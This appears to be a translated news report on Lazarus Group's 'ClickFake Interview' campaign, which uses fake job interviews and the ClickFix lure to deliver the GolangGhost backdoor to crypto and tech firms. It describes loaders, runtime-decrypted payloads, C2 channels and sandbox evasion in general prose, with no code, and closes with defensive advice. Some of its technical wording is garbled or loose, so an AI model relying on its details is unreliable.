A sophisticated cyber espionage campaign led by the Advanced Agent Cluster of the Lazarus Group has just been exposed by the Sekoia Threat Detection and Response (TDR) group. The campaign, titled “ClickFake Interview”, uses a deliberate psychological manipulation technique called ClickFix to spread GolangGhost malware, targeting organizations in the cryptocurrency and technology sectors.

ClickFix.png

ClickFake Interview is a sociological tactic that tricks victims by masquerading as employment interviews. Hackers create messages impersonating employers, luring users into interacting with documents or paths that contain the malware by using excuses to prepare for interviews. The campaign is part of a series of attacks called “ContagiousInterview”, reflecting Lazarus’s innovation in mining strategies aimed at objects in a strongly growing digital asset ecosystem.

1753246459345.png

At the core of the campaign was the ClickFix technique, a multi-stage mining process designed to ensure robustness and hard to detect. The process typically begins with a rogue file containing malicious embedding, using intermediate loaders such as PowerShell scripts, Office macro, or shortcut files to bypass the defenses. Once activated, the malicious code uses a cascaded payload delivery technique, in which the shellcode or dropper is encrypted and decrypted at runtime, thereby silently deploying GolangGhost and avoiding the sandbox’s recording of the behavior.

1753246489866.png

GolangGhost is an implant backdoor developed in the Go programming language to optimize cross-platform functionality, supporting both Windows, Linux and macOS. This code interfaces with the control server (C2) via an encryption channel, integrating dynamic downloadable modules, enabling remote functions such as system command execution, sensitive information stealing, file collection, intranet scanning, and horizontal movement in corporate environments. In addition to modularity, malicious code uses obfuscation, simulating normal behavior and avoiding API hooks commonly used in surveillance systems.

The ContagiousInterview campaign reflects the remarkable evolution of tactics, techniques and processes (TTPs) by the Lazarus Group. The combination of social factors and a sophisticated malware deployment mechanism such as ClickFix helps to improve infection success rates while reducing the likelihood of early detection. The focus on organizations and individuals in the cryptocurrency sector suggests that financial incentives and strategic intelligence continue to be the focus of this hacker group.

About the finding, WhiteHat said: “ClickFix is essentially a mining sequence combining sociology and intermediate mining techniques. Lazarus takes advantage of the hierarchical control model to avoid the sandbox recording the entire behavior. The GolangGhost code shows a clear investment with modularity and avoids back-analysis by blurring the code as well as avoiding API hook. ClickFix is more than just a method of spreading, it is a highly scripted, purposeful, and adaptive scam process according to user behavior. This is a clear indication that Lazarus is investing heavily in both engineering and exploiting the human element. ”

In – depth analysis from Sekoia not only helped to elucidate new attack methods but also provided a comprehensive view of how hackers integrated social manipulation and advanced programming techniques in order to overcome traditional security barriers. Organizations operating in crypto, fintech, and technology are recommended to strengthen email filtering, implement robust EDR solutions, and promote new spear-phishing awareness training such as ClickFake Interview.

The appearances of ClickFix and GolangGhost suggest that Lazarus is working on adapting their attack techniques in a way that both increases customization and increases the ability to cross the behavior analysis line. Defense teams need to focus on dynamic load detection, monitor irregular progress, control over misused remote administration tools, and enhance human – level incident response, which remains an easy link to exploitation by both the APT team and cybercriminal organizations.

According to Cyber Press and WhiteHat